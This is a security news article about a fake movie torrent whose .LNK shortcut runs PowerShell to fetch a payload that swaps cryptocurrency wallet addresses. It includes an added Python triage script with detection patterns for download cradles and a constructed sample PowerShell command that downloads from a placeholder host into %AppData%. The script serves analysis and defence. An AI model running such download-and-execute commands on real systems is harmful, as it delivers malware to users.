Malware Disguised as Movies on Torrent Sites Steals Cryptocurrency
A security researcher known by the alias 0xffff0800 discovered a suspicious file being distributed on the torrent tracker The Pirate Bay. The file was listed as the movie “The Girl in the Spider’s Web,” but instead of the film, users downloaded a Windows shortcut (.LNK) file whose target is a PowerShell command. Notably, at the time of discovery, 2,375 people were sharing this fake “movie.”
As soon as the fake movie file is launched, the embedded PowerShell command is executed, which triggers a chain of further commands. This ultimately leads to the download of a payload into the %AppData% folder. Essentially, PowerShell connects to the attackers’ command and control server, which then redirects to Pastebin, where further instructions are stored.
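To make the shortcut trick concrete, here is an added example (not code from the original article or from the researchers it quotes) that parses the StringData section of a Shell Link file according to the MS-SHLLINK layout and flags the traits described above: a powershell.exe target, a download cradle in the arguments, a drop into %AppData%, a minimized window and a borrowed icon. The .LNK bytes, the command line and the domain c2.example.invalid are constructed for the demo and are not indicators from the real file.

```python
"""Triage a Windows .LNK file for a PowerShell download-and-execute launcher.
Added example, not the analysed file. The sample below is constructed here;
c2.example.invalid is a placeholder domain, not a real indicator."""
import os
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # window starts minimized; common in malicious shortcuts


def build_lnk(relative_path, arguments="", icon_location="", show_command=SW_SHOWMINNOACTIVE):
    """Serialise a minimal MS-SHLLINK file (76-byte header + StringData) for testing the parser."""
    flags = IS_UNICODE | HAS_REL_PATH
    if arguments:
        flags |= HAS_ARGS
    if icon_location:
        flags |= HAS_ICON
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 FILETIMEs, FileSize, IconIndex,
    # ShowCommand, HotKey, Reserved1, Reserved2, Reserved3
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def string_data(text):  # CountCharacters (uint16) followed by UTF-16LE characters
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = string_data(relative_path)
    if arguments:
        body += string_data(arguments)
    if icon_location:
        body += string_data(icon_location)
    return header + body


def parse_lnk(data):
    """Validate the header, skip optional LinkTargetIDList/LinkInfo, read StringData fields."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    link = {"show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    pos = 0x4C
    if flags & HAS_ID_LIST:      # IDListSize (uint16) + ItemIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:    # LinkInfoSize (uint32) covers the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    for key, bit in (("name", HAS_NAME), ("relative_path", HAS_REL_PATH), ("working_dir", HAS_WORK_DIR),
                     ("arguments", HAS_ARGS), ("icon_location", HAS_ICON)):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            link[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            link[key] = data[pos:pos + count].decode("cp1252")
            pos += count
    return link


INDICATORS = [
    ("PowerShell launched from a shortcut", re.compile(r"powershell(\.exe)?|\bpwsh\b", re.I)),
    ("download cradle", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I)),
    ("encoded command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden window or policy bypass", re.compile(
        r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-e(p|xecutionpolicy)\s+bypass", re.I)),
    ("writes into %AppData%", re.compile(r"appdata", re.I)),
    ("Pastebin used for staging", re.compile(r"pastebin\.com", re.I)),
]


def triage(data):
    """Return (parsed fields, findings). Two or more findings deserve an analyst's attention."""
    link = parse_lnk(data)
    text = link.get("relative_path", "") + " " + link.get("arguments", "")
    findings = [label for label, rx in INDICATORS if rx.search(text)]
    if link["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimized")
    target = os.path.basename(link.get("relative_path", "").replace("\\", "/")).lower()
    icon = os.path.basename(link.get("icon_location", "").replace("\\", "/")).lower()
    if icon and icon != target:  # shortcut wears another program's icon
        findings.append("icon borrowed from " + icon)
    return link, findings


# Constructed sample mirroring the described shortcut (placeholder C2 domain, not a real IOC).
SAMPLE_LNK = build_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments=(r"-nop -w hidden -c $c=New-Object Net.WebClient;"
               r"$c.DownloadFile('http://c2.example.invalid/s1',$env:AppData+'\m.exe')"),
    icon_location=r"C:\Program Files\Windows Media Player\wmplayer.exe",
)

if __name__ == "__main__":
    link, findings = triage(SAMPLE_LNK)
    print("target:", link["relative_path"])
    print("args  :", link["arguments"])
    for finding in findings:
        print(" -", finding)
```

For a real sample, read the file with `open(path, "rb").read()` and pass the bytes to `triage`; the parser only walks the header and StringData, so the optional ExtraData blocks at the end of a shortcut are ignored, which is enough to recover the command line that matters here.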
After checking the file on VirusTotal, the researcher noticed that not all security solutions detected it as malicious. The researcher also suggested that the file might be linked to the well-known hacker group Cozy Bear (also known as APT29, CozyDuke and CozyCar, and one of the groups covered by the US government’s Grizzly Steppe designation), which has used similar techniques in previous attacks.
However, Nick Carr, an expert from FireEye, disagreed with this theory. He pointed out that malicious .LNK files are used very frequently, especially to trick users of “pirate” sites, and that CozyBear is far from the only group using this method.
0xffff0800 published the .LNK file publicly so that other specialists could study it. Lawrence Abrams, founder of BleepingComputer, found that executing the .LNK file not only injects ads into the Google homepage, as initially suspected, but also tampers with web pages in the browser, including swapping cryptocurrency wallet addresses for the attackers’ own, which is how the campaign steals cryptocurrency.